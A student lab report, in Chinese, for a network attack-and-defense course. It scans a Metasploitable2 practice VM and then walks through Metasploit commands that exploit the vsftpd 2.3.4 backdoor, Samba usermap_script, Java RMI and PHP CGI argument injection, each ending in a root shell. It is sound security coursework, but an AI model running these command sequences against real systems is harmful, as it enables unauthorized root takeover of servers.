20232311 2025-2026-1 《网络与系统攻防技术》实验六实验报告

实验内容

• 发现靶机Metasploitable2并进行端口扫描、版本扫描以及漏洞扫描等等
• 利用Vsftpd源码包后门漏洞进行攻击
• 利用SambaMS-RPC Shell命令注入漏洞
• 利用Java RMI SERVER命令执行漏洞
• 利用PHP CGI参数执行注入漏洞

实验目的

• 通过使用Metasploit渗透测试框架，对靶机Metasploitable2上的多个典型服务漏洞（如Vsftpd、Samba、Java RMI、PHP CGI）进行探测、利用和验证，从而掌握Metasploit的基本操作流程和漏洞利用方法

实验环境

• 安装Kali镜像的VMware虚拟机
  
• Metasploitable2虚拟机
  

实验过程

一、前期渗透

1、主机发现

• 首先在靶机Metasploitable2上进行ifconfig查看靶机IP便于后续扫描实验，靶机IP为192.168.181.145
  
• 在kali虚拟机中先切换到root模式下，使用msfconsole进入控制台，在Metasploit中搜索ARP扫描模块arp_sweep并使用它，具体命令如下：

msfconsole //打开控制台
search arp_sweep //搜索扫描模块
use 0 //使用它
set RHOSTS 192.168.181.0/24 //设置扫描的网段
run //启动攻击

• 由上图可知扫描结果，标识为VMware, Inc.，说明靶机为一台VMware虚拟机

2、端口扫描

• 使用nmap进行端口扫描
  • 使用nmap -sS -sV 192.168.181.145命令靶机进行高效隐蔽的SYN扫描，同时探测开放端口上运行的服务及版本信息
    
  • 由上图扫描结果可知靶机有很多开放的端口
• 在Metasploit使用portscan/tcp进行扫描，具体命令如下：

msfconsole //打开Metasploit框架的控制台界面
use auxiliary/scanner/portscan/tcp //加载TCP端口扫描的辅助模块
set RHOSTS 192.168.181.145 //设置扫描的目标主机IP地址
set THREADS 10 //设置扫描时使用的线程数为10,提高扫描效率
run //启动攻击

• 由上图可知，扫描出的端口数比使用nmap扫出来的略多

3、漏洞扫描

• 使用nmap -script=vuln 192.168.181.145对靶机进行漏洞扫描。其中，-script=vuln表示调用nmap自带的漏洞检测脚本集，通过发送特定探测包、检查服务响应等方式，识别靶机上可能存在的已知安全漏洞
  扫描发现存在大量漏洞，分析如下：
  • 靶机21端口（FTP服务）：存在vsFTPd 2.3.4后门漏洞（CVE-2011-2523），该漏洞是vsFTPd 2.3.4版本被植入的恶意后门，攻击者可通过特定操作直接获取root权限（扫描结果中已执行id命令得到root权限），属于可直接利用的高危漏洞，威胁程度极高。
    
  • 靶机25端口（SMTP 服务）的两个漏洞：一是SMTP服务未受Exim漏洞（CVE-2010-4344）影响；二是存在SSL POODLE信息泄露漏洞（CVE-2014-3566），该漏洞利用SSL 3.0的CBC填充缺陷，攻击者可通过中间人攻击获取明文数据，会导致通信内容泄露，属于中高危漏洞。
    
  • 靶机80端口（HTTP 服务）：存在HTTP SQL注入漏洞，扫描结果列出了多个可能存在注入的URL路径（如Mutilidae应用的各类页面），SQL注入漏洞允许攻击者构造恶意SQL语句执行未授权操作如读取/篡改数据库、获取敏感信息，是Web应用中常见的高危漏洞之一。
    
  • 这是80端口的多个HTTP相关漏洞：一是 HTTP TRACE方法启用，可能被用于跨站追踪等攻击；二是存在Slowloris拒绝服务漏洞（CVE-2007-6750），该漏洞通过保持大量半开连接耗尽Web服务器资源，导致服务不可用；同时未检测到存储型XSS漏洞，整体来看Slowloris属于可造成业务中断的中危漏洞。
    
  • 靶机1099端口（RMI 注册服务）：存在RMI注册中心默认配置远程代码执行漏洞，由于RMI注册中心默认允许从远程URL加载类，攻击者可构造恶意类文件触发远程代码执行，能够直接控制靶机，属于高危漏洞。
    
  • 涉及靶机5432端口（PostgreSQL 服务）的多个SSL相关漏洞：包括CCS注入漏洞（CVE-2014-0224），可被中间人攻击劫持会话、窃取敏感信息，风险等级高、SSL POODLE信息泄露漏洞（CVE-2014-3566），重复出现，再次印证通信数据泄露风险，以及Diffie-Hellman密钥交换组强度不足漏洞，易被被动窃听，这些漏洞共同导致该端口的加密通信安全性大幅降低，属于中高危风险集合。
    
  • 靶机6667端口（IRC 服务）存在UnrealIRCd 后门漏洞：该端口运行的UnrealIRCd IRC服务器被植入了恶意后门（属于被篡改的恶意版本），攻击者可利用此后门直接执行任意命令，进而控制靶机，属于高危可利用漏洞
    

二、利用Vsftpd源码包后门漏洞进行攻击

• 使用nmap -sV -p 21 192.168.181.145扫描靶机的21端口，检查该端口是否开启以及运行在该端口的服务是否为vsftpd 2.3.4，结果肯定
  
• 使用Metasploit框架利用漏洞进行攻击，具体命令如下：

msfconsole //打开Metasploit框架的控制台界面
search vsftpd //在Metasploit中搜索与vsftpd相关的漏洞利用模块
use 1 //对应版本号选择搜索结果中序号为1的vsftpd漏洞利用模块
set RHOSTS 192.168.181.145 //设置扫描的目标主机IP地址
run //启动攻击

• 使用Vsftpd源码包后门漏洞攻击成功，获取主机shell,执行操作进行验证：
  
  • pwd // 查看当前在靶机文件系统中的工作目录，执行结果显示当前处于根目录（/）
  • ls // 列出当前目录下的所有文件和文件夹，这里展示了靶机根目录下的系统目录（如 bin、boot 等）
  • whoami // 查看当前登录靶机的用户身份，执行结果显示当前是root用户
  • id // 查看当前用户的UID、GID等身份信息，执行结果显示当前是拥有最高权限的root用户（uid=0、gid=0）

三、利用SambaMS-RPC Shell命令注入漏洞

• 使用nmap -p 139 192.168.181.145扫描靶机的139端口，检查该端口是否开启以及运行在该端口的服务
  
• 使用Metasploit框架利用漏洞进行攻击，具体命令如下：

msfconsole //打开Metasploit框架的控制台界面
use exploit/multi/samba/usermap_script //加载针对Samba服务usermap_script漏洞的利用模块
set RHOSTS 192.168.181.145 //设置目标主机IP地址
exploit //启动攻击

• 由上图可知，利用usermap_script漏洞攻击成功，获取主机shell,使用操作验证：
  • whoami // 查看当前登录靶机的用户身份，执行结果显示当前是root用户；
  • pwd // 查看当前在靶机文件系统中的工作目录，执行结果显示当前处于根目录（/）
  • uname -a //尝试查看靶机的系统内核及版本信息,但是这里打快了，后续会有正确示例

4、利用Java RMI SERVER命令执行漏洞

• 操作如上一步，先使用nmap -p 1099 192.168.181.145扫描靶机的1099端口，检查该端口是否开启以及运行在该端口的服务
  
• 使用Metasploit框架利用漏洞进行攻击，具体命令如下：

msfconsole //打开Metasploit框架的控制台界面
use exploit/multi/misc/java_rmi_server//加载针对Java RMI服务的漏洞利用模块
show options //查看配置参数
set RHOSTS 192.168.181.145 //设置扫描的目标主机IP地址
run //启动攻击
shell//切换到交互式Shell

• 由上图可知，利用针对Java RMI服务的漏洞攻击成功，获取主机shell,使用操作验证：
  • uname -a // 查看靶机系统信息，执行结果显示靶机是Linux系统（版本为2.6.24-16-server，架构i686）
  • whoami // 查看当前登录靶机的用户身份，执行结果显示当前为root用户
  • pwd // 查看当前在靶机文件系统中的工作目录，执行结果显示处于根目录（/）
  • ls // 列出当前目录下的文件和文件夹，展示了靶机根目录下的系统目录（如 bin、boot 等）

5、利用PHP CGI参数执行注入漏洞

• 操作如上一步，先使用nmap -p 80 192.168.181.145扫描靶机的80端口，检查该端口是否开启以及运行在该端口的服务
  
• 使用Metasploit框架利用漏洞进行攻击，具体命令如下：

msfconsole //打开Metasploit框架的控制台界面
use exploit/multi/http/php_cgi_arg_injection//加载针对PHP CGI参数注入漏洞的利用模块，该模块用于攻击存在参数注入缺陷的PHP CGI服务。
set RHOSTS 192.168.181.145 //设置扫描的目标主机IP地址
run //启动攻击
shell//切换到交互式Shell

• 由上图可知，利用PHP CGI参数执行注入漏洞攻击成功，获取主机shell,使用操作whoami、pwd、uname -a验证顺利

问题及解决方案

问题：一开始使用nmap扫描发现无法扫到靶机
解决方案：原来是上一次实验将kali的网络设置改动过，将其改回NAT即可

学习感悟、思考

• 这次Metasploitable2的渗透实验，让我对漏洞利用从概念层面落地到了实际操作中。从前期的主机发现、端口扫描到漏洞探测，再到逐个利用Vsftpd后门、Samba注入等漏洞获取root权限，我直观感受到了旧版本服务的高危性，比如vsFTPd 2.3.4的恶意后门，几乎是一键获取权限，这也让我明白企业中及时更新服务版本绝不是一句空话。
• 同时，Metasploit的模块化设计也让我学到很多：从搜索模块到配置参数再到执行攻击，流程的标准化既降低了渗透门槛，也体现了渗透测试工具化+流程化的特点，但这也意味着攻击者的成本被大幅降低，防守方需要更全面的资产梳理与漏洞管控。